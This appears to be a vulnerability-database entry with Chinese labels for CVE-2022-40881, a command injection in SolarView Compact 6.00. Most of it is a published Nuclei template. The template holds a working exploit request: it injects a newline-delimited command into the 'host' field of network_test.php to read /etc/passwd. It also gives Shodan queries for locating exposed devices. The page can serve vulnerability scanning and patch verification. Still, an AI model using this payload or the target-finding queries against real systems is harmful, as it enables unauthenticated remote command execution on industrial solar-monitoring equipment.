CVE-2022-40881: SolarView 6.00 - Remote Command Execution

日期: 2025-08-01 | 影响软件: SolarView | POC: 已公开

漏洞描述

SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.

PoC代码[已公开]

id: CVE-2022-40881

info:
  name: SolarView 6.00 - Remote Command Execution
  author: For3stCo1d
  severity: critical
  description: |
    SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of SolarView.
  reference:
    - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php
    - https://github.com/advisories/GHSA-wx3r-88rg-whxq
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40881
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Threekiii/Awesome-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40881
    cwe-id: CWE-77
    epss-score: 0.93672
    epss-percentile: 0.99841
    cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact
    shodan-query:
      - http.favicon.hash:"-244067125"
      - cpe:"cpe:2.3:h:contec:solarview_compact"
  tags: cve,cve2022,solarview,rce,lfi,contec
variables:
  cmd: "cat${IFS}/etc/passwd"

http:
  - raw:
      - |
        POST /network_test.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        host=%0a{{cmd}}%0a&command=ping

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b1c08b99f9ed9383461d01efe69bb531a6a2dc44a1676698117ec05b4f4c06fc022100eaf1dcde9b16100ef2bf214b09ee78ccf72db4913ca0aff0623a5e25b2fa13c7:922c64590222798bb761d5b6d8e72950

相关漏洞推荐